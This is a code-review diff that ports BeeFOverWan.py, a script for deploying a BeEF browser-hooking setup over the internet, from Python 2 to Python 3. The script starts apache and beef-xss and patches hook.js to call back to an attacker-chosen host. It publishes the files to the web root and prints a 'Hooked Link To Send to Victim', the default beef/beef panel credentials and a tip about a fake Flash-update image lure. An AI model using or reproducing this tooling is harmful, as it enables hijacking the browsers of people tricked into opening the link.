Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
107 changes: 54 additions & 53 deletions BeeFOverWan.py
Original file line number Diff line number Diff line change
Expand Up @@ -95,64 +95,65 @@ def string_replace(filename, old_string, new_string):
#print 'Changing "{old_string}" to "{new_string}" in {filename}'.format(**locals())
s = s.replace(old_string, new_string)
f.write(s)
print color('[✔] File Changed...','green')

print(color('[✔] File Changed...','green'))




if __name__ == '__main__':
os.system("clear")


print color(instruction(),"green")
print color("[*] IF you want to Do this Without Port Forwarding : Use NGROK\n")
ng_check=raw_input(color("[?] Press '1' to see NGROK Instructions else Press '0' : "))
print ng_check
if (ng_check):
print color(ngrok(),"green")
con=raw_input(color("[?] Press Enter to Continue ..."))
os.system("clear")
print color(" Checking Services Status Required ","blue")
os.system("service apache2 start")
os.system("beef-xss")
os.system("clear")
print color("All Good So far ... \n Close The Browser If Prompted .. ","green")
print color(banner(),"green")
send_to=raw_input(color((' [?] Enter Adress of Link [You are Sending to Victim]: ')))
send_to=send_to.rstrip()
print color((" [+] Send_To Link : "+ send_to))
connect_to=raw_input(color((' [?] Enter Adress of Link [Your Link will be Connecting to..]: ')))
connect_to=connect_to.rstrip()
print color((" [+] Connect_To Link : "+ connect_to))
print color('[✔] Checking directories...','green')
if not os.path.isdir("./temp"):
os.makedirs("./temp")
print (color("[+] Creating [./temp] directory for resulting code files","green"))
else:
os.system("rm -rf temp/*")
print color("Clean Succesful","green")
connect_to_full='http://'+connect_to+":80/hook.js"
connect_to_panel='http://'+connect_to+"/ui/panel"
send_to_full='http://'+send_to+'/beef.html'
#print connect_to_full
os.system("cp base.js ./temp/hook.js")
string_replace("./temp/hook.js","SKS_1",connect_to_full)
string_replace("./temp/hook.js","SKS_2",connect_to)

os.system("cp beef.html ./temp/beef.html")
string_replace("./temp/beef.html","SKS_3",send_to)
os.system("cp ./temp/* /var/www/html/")
os.system("chmod a+rw /var/www/html/hook.js")

print color("\n==================================== RESULT ====================================\n","blue")
print color("[+] Access The BeeF Control Panel Using : {}".format(connect_to_panel),"green")
print color("\t Username = beef\n\t Password = beef\n","blue")
print color("[+] Hooked Link To Send to Victim : "+send_to_full,"green")
print color ('[?]\n\nNote : I know few of the Exploits does not work\n due to Updated Browsers and stuff...\n\nTip : Change Payload or Images Address to your Connect_to Address with Port 80 \n\t Example : \n\t\t')
print color("\tFROM Image URL : http://0.0.0.0:3000/adobe/flash_update.png\n","red")
print color("\tTO Image URL : http://{}:80/adobe/flash_update.png \n".format(connect_to),"green")
print color ('\n Happy Hacking !!!\n Have Problem or Tip ? Contact : https://github.com/stormshadow07',"green")
os.system("clear")


print (color(instruction(),"green"))
print (color("[*] IF you want to Do this Without Port Forwarding : Use NGROK\n"))
ng_check=input(color("[?] Press '1' to see NGROK Instructions else Press '0' : "))
print(ng_check)
if (ng_check):
print (color(ngrok(),"green"))
con=input(color("[?] Press Enter to Continue ..."))
os.system("clear")
print(color(" Checking Services Status Required ","blue"))
os.system("service apache2 start")
os.system("beef-xss")
os.system("clear")
print(color("All Good So far ... \n Close The Browser If Prompted .. ","green"))
print(color(banner(),"green"))
send_to=input(color((' [?] Enter Adress of Link [You are Sending to Victim]: ')))
send_to=send_to.rstrip()
print(color((" [+] Send_To Link : "+ send_to)))
connect_to=input(color((' [?] Enter Adress of Link [Your Link will be Connecting to..]: ')))
connect_to=connect_to.rstrip()
print(color((" [+] Connect_To Link : "+ connect_to)))
print (color('[✔] Checking directories...','green'))
if not os.path.isdir("./temp"):
os.makedirs("./temp")
print (color("[+] Creating [./temp] directory for resulting code files","green"))
else:
os.system("rm -rf temp/*")
print(color("Clean Succesful","green"))
connect_to_full='http://'+connect_to+":80/hook.js"
connect_to_panel='http://'+connect_to+"/ui/panel"
send_to_full='http://'+send_to+'/beef.html'
#print connect_to_full
os.system("cp base.js ./temp/hook.js")
string_replace("./temp/hook.js","SKS_1",connect_to_full)
string_replace("./temp/hook.js","SKS_2",connect_to)

os.system("cp beef.html ./temp/beef.html")
string_replace("./temp/beef.html","SKS_3",send_to)
os.system("cp ./temp/* /var/www/html/")
os.system("chmod a+rw /var/www/html/hook.js")

print (color("\n==================================== RESULT ====================================\n","blue"))
print (color("[+] Access The BeeF Control Panel Using : {}".format(connect_to_panel),"green"))
print (color("\t Username = beef\n\t Password = beef\n","blue"))
print (color("[+] Hooked Link To Send to Victim : "+send_to_full,"green"))
print (color ('[?]\n\nNote : I know few of the Exploits does not work\n due to Updated Browsers and stuff...\n\nTip : Change Payload or Images Address to your Connect_to Address with Port 80 \n\t Example : \n\t\t'))
print (color("\tFROM Image URL : http://0.0.0.0:3000/adobe/flash_update.png\n","red"))
print (color("\tTO Image URL : http://{}:80/adobe/flash_update.png \n".format(connect_to),"green"))
print (color ('\n Happy Hacking !!!\n Have Problem or Tip ? Contact : https://github.com/stormshadow07',"green"))





Expand Down